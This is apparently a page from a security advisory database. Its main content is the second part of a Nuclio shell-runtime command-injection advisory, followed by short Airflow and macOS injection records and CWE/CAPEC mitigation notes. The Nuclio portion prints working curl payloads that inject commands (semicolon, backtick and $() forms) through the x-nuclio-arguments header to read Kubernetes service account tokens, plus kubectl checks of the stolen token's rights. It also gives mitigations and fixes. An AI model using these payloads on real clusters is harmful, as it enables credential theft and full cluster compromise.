groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\nroot\n```\n\n**Test 2: Extract ServiceAccount Token**\n\n```bash\nkubectl run -n nuclio token-extract \\\n --image=curlimages/curl:latest \\\n --rm -i --restart=Never -- \\\n curl -s -X POST \\\n -H \"Content-Type: text/plain\" \\\n -H \"x-nuclio-arguments: ; cat /var/run/secrets/kubernetes.io/serviceaccount/token ;\" \\\n -d \"test\" \\\n http://nuclio-shell-func:8080\n```\n\n**Expected Output:**\n```\neyJhbGciOiJSUzI1NiIsImtpZCI6IldUZFN0d3dod2hSNE8yLWtRZmc0Z0N0UWNtaDMxVDhEVlQyYWRnS3AzbEkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxODAyMzk4Mzg3...\n```\n\n**Test 3: Validate Token Privileges**\n\n```bash\n# Extract token from previous output and test permissions\nTOKEN=\"\u003cextracted-token\u003e\"\n\nkubectl auth can-i --list --token=\"$TOKEN\"\n```\n\n**Expected Output:**\n```\nResources Non-Resource URLs Resource Names Verbs\n*.* [] [] [*]\n [*] [] [*]\n```\n\nThis confirms the token has cluster-admin level permissions.\n\n**Test 4: Verify Cluster Access**\n\n```bash\n# Test reading secrets\nkubectl auth can-i get secrets --all-namespaces --token=\"$TOKEN\"\n# Output: yes\n\n# Test creating pods\nkubectl auth can-i create pods --all-namespaces --token=\"$TOKEN\"\n# Output: yes\n```\n\n### Alternative Injection Methods\n\n**Backtick Injection:**\n```bash\ncurl -s -X POST \\\n -H \"Content-Type: text/plain\" \\\n -H \u0027x-nuclio-arguments: `cat /var/run/secrets/kubernetes.io/serviceaccount/token`\u0027 \\\n -d \"test\" \\\n http://nuclio-shell-func:8080\n```\n\n**$() Syntax Injection:**\n```bash\ncurl -s -X POST \\\n -H \"Content-Type: text/plain\" \\\n -H \u0027x-nuclio-arguments: $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\u0027 \\\n -d \"test\" \\\n http://nuclio-shell-func:8080\n```\n\nBoth methods successfully extract the token.\n\n## Impact\n\n### Severity Assessment\n\nThis vulnerability enables complete cluster compromise through a multi-stage attack:\n\n**Stage 1: Command Injection**\n- Attacker injects malicious commands via HTTP header\n- Commands execute with root privileges in function container\n- No authentication or authorization checks on command content\n\n**Stage 2: Credential Theft**\n- Attacker reads ServiceAccount token from mounted secret\n- Token belongs to `system:serviceaccount:nuclio:default`\n- Token has cluster-admin level permissions\n\n**Stage 3: Privilege Escalation**\n- Attacker uses stolen token to authenticate to Kubernetes API\n- Gains full control over all cluster resources\n- Can read all secrets, create/modify/delete any resource\n\n### Affected Resources\n\n**Confidentiality Impact:** High\n- All secrets across all namespaces can be read\n- Database credentials, API keys, certificates exposed\n- Application data and configuration accessible\n\n**Integrity Impact:** High\n- Attacker can modify any cluster resource\n- Can deploy malicious workloads\n- Can alter RBAC policies and security controls\n- Can inject backdoors for persistent access\n\n**Availability Impact:** Medium\n- Attacker can delete critical resources\n- Can deploy resource-intensive workloads causing DoS\n- Can disrupt cluster operations\n\n### Real-World Attack Scenarios\n\n**Scenario 1: Data Breach**\n1. Attacker gains function invocation access (low privilege)\n2. Injects command to extract ServiceAccount token\n3. Uses token to read all secrets in production namespace\n4. Exfiltrates database credentials and API keys\n5. Accesses production databases and external services\n\n**Scenario 2: Supply Chain Compromise**\n1. Attacker compromises CI/CD pipeline\n2. Deploys malicious Nuclio function\n3. Function automatically executes on deployment\n4. Establishes persistent backdoor in cluster\n5. Pivots to compromise other applications\n\n**Scenario 3: Ransomware Attack**\n1. Attacker exploits vulnerability to gain cluster access\n2. Deploys crypto-mining or ransomware pods\n3. Encrypts persistent volumes\n4. Demands ransom for decryption keys\n\n## Severity\n\n**CVSS v3.1 Vector:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L\n\n**CVSS Score:** 9.1 (Critical)\n\n**Justification:**\n- **Attack Vector (Network):** Exploitable remotely via HTTP\n- **Attack Complexity (Low):** No special conditions required\n- **Privileges Required (Low):** Only function invocation permission needed\n- **User Interaction (None):** Fully automated exploitation\n- **Scope (Changed):** Breaks out of function container to cluster level\n- **Confidentiality (High):** Complete access to all secrets\n- **Integrity (High):** Full control over cluster resources\n- **Availability (Low):** Limited direct availability impact\n\n## Affected Versions\n\n- Nuclio: All versions up to and including 1.15.19\n- Component: Shell Runtime (`pkg/processor/runtime/shell`)\n\nThe vulnerability exists in all versions that include the Shell Runtime component, as the vulnerable code pattern has been present since the feature\u0027s introduction.\n\n## Patched Versions\n\nNo patch is currently available. Users should implement workarounds until an official fix is released.\n\n## Workarounds\n\n### Immediate Mitigation (Choose One)\n\n**Option 1: Disable Shell Runtime**\n\nAdd to Nuclio platform configuration:\n\n```yaml\nplatformConfig:\n runtimes:\n shell:\n enabled: false\n```\n\nThis completely disables the vulnerable component but breaks existing Shell Runtime functions.\n\n**Option 2: Restrict Function Deployment**\n\nLimit who can deploy functions using RBAC:\n\n```yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n name: nuclio-function-deployer\n namespace: nuclio\nrules:\n- apiGroups: [\"nuclio.io\"]\n resources: [\"nucliofunctions\"]\n verbs: [\"create\", \"update\", \"patch\"]\n # Only grant to trusted users\n```\n\nRemove default function deployment permissions from untrusted users.\n\n**Option 3: Network Isolation**\n\nRestrict egress traffic from function pods:\n\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: nuclio-processor-egress\n namespace: nuclio\nspec:\n podSelector:\n matchLabels:\n nuclio.io/component: processor\n policyTypes:\n - Egress\n egress:\n - to:\n - podSelector: {}\n ports:\n - protocol: TCP\n port: 443 # Only allow HTTPS to cluster API\n```\n\nThis limits the attacker\u0027s ability to exfiltrate data but doesn\u0027t prevent the initial exploitation.\n\n### Long-Term Fixes\n\n**Fix 1: Input Validation**\n\nImplement strict validation in `getCommandArguments`:\n\n```go\nimport \"regexp\"\n\nvar argumentsRegex = regexp.MustCompile(`^[a-zA-Z0-9_\\-=., ]+$`)\n\nfunc (s *shell) getCommandArguments(event nuclio.Event) []string {\n arguments := event.GetHeaderString(headers.Arguments)\n\n if arguments == \"\" {\n arguments = s.configuration.Arguments\n }\n\n if !argumentsRegex.MatchString(arguments) {\n s.Logger.ErrorWith(\"Invalid arguments: contains unsafe characters\")\n return []string{}\n }\n\n return strings.Split(arguments, \" \")\n}\n```\n\n**Fix 2: Remove sh -c Execution**\n\nUse parameterized command execution:\n\n```go\nfunc (s *shell) processEvent(context context.Context,\n command []string,\n event nuclio.Event,\n responseChan chan nuclio.Response) {\n\n var cmd *exec.Cmd\n\n if len(command) \u003e 0 {\n cmd = exec.CommandContext(context, command[0], command[1:]...)\n } else {\n // Handle error\n return\n }\n\n cmd.Stdin = strings.NewReader(string(event.GetBody()))\n // ... rest of code\n}\n```\n\n**Fix 3: Limit ServiceAccount Permissions**\n\nCreate restricted ServiceAccount for function pods:\n\n```yaml\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: nuclio-function-sa\n namespace: nuclio\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n name: nuclio-function-role\n namespace: nuclio\nrules:\n- apiGroups: [\"\"]\n resources: [\"configmaps\"]\n verbs: [\"get\", \"list\"]\n# Do not grant secrets or cross-namespace access\n```\n\n## Resources\n\n- Nuclio GitHub: https://github.com/nuclio/nuclio\n- CWE-78: OS Command Injection: https://cwe.mitre.org/data/definitions/78.html\n- OWASP Command Injection: https://owasp.org/www-community/attacks/Command_Injection\n- Kubernetes Security Best Practices: https://kubernetes.io/docs/concepts/security/\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@j311yl0v3u (2439839508@qq.com)",
"id": "GHSA-95fj-3w7g-4r27",
"modified": "2026-03-06T21:57:17Z",
"published": "2026-03-04T21:05:51Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nuclio/nuclio/security/advisories/GHSA-95fj-3w7g-4r27"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29042"
},
{
"type": "WEB",
"url": "https://github.com/nuclio/nuclio/pull/4030"
},
{
"type": "WEB",
"url": "https://github.com/nuclio/nuclio/commit/5352d7e16cf92f4350a2f8d806c4b80b626b5c5a"
},
{
"type": "PACKAGE",
"url": "https://github.com/nuclio/nuclio"
},
{
"type": "WEB",
"url": "https://github.com/nuclio/nuclio/releases/tag/1.15.20"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Nuclio Shell Runtime Command Injection Leading to Privilege Escalation"
}
GHSA-9R64-3WMC-X8M8
Vulnerability from github – Published: 2025-06-26 21:31 – Updated: 2025-06-27 21:15Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) vulnerability in Apache Airflow Providers Snowflake.
This issue affects Apache Airflow Providers Snowflake: before 6.4.0.
Sanitation of table and stage parameters were added in CopyFromExternalStageToSnowflakeOperator to prevent SQL injection Users are recommended to upgrade to version 6.4.0, which fixes the issue.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "apache-airflow-providers-snowflake"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-50213"
],
"database_specific": {
"cwe_ids": [
"CWE-75"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-27T21:15:56Z",
"nvd_published_at": "2025-06-24T08:15:24Z",
"severity": "CRITICAL"
},
"details": "Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) vulnerability in Apache Airflow Providers Snowflake.\n\nThis issue affects Apache Airflow Providers Snowflake: before 6.4.0.\n\nSanitation of table and stage parameters were added in\u00a0CopyFromExternalStageToSnowflakeOperator\u00a0to prevent\u00a0SQL injection\nUsers are recommended to upgrade to version 6.4.0, which fixes the issue.",
"id": "GHSA-9r64-3wmc-x8m8",
"modified": "2025-06-27T21:15:56Z",
"published": "2025-06-26T21:31:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50213"
},
{
"type": "WEB",
"url": "https://github.com/apache/airflow/pull/51734"
},
{
"type": "WEB",
"url": "https://github.com/apache/airflow/pull/51734/commits/bcf19916738e4a7065a3911814ba1fa32d6fd669"
},
{
"type": "WEB",
"url": "https://github.com/apache/airflow"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow-providers-snowflake/PYSEC-2025-51.yaml"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/2kqfmyt2pghg5f6797g8hzvq331v8qx3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache Airflow Providers Snowflake package allows for Special Element Injection via CopyFromExternalStageToSnowflakeOperator"
}
GHSA-9W9W-6VPX-X9Q3
Vulnerability from github – Published: 2024-03-08 03:31 – Updated: 2026-04-02 21:31An injection issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to elevate privileges.
{
"affected": [],
"aliases": [
"CVE-2024-23274"
],
"database_specific": {
"cwe_ids": [
"CWE-74",
"CWE-75"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-08T02:15:49Z",
"severity": "HIGH"
},
"details": "An injection issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to elevate privileges.",
"id": "GHSA-9w9w-6vpx-x9q3",
"modified": "2026-04-02T21:31:38Z",
"published": "2024-03-08T03:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23274"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120884"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120886"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120895"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214083"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214084"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214085"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214083"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214084"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214085"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Mar/21"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Mar/22"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Mar/23"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Programming languages and supporting technologies might be chosen which are not subject to these issues.
Mitigation
Utilize an appropriate mix of allowlist and denylist parsing to filter special element syntax from all input.
CAPEC-81: Web Server Logs Tampering
Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.
CAPEC-93: Log Injection-Tampering-Forging
This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.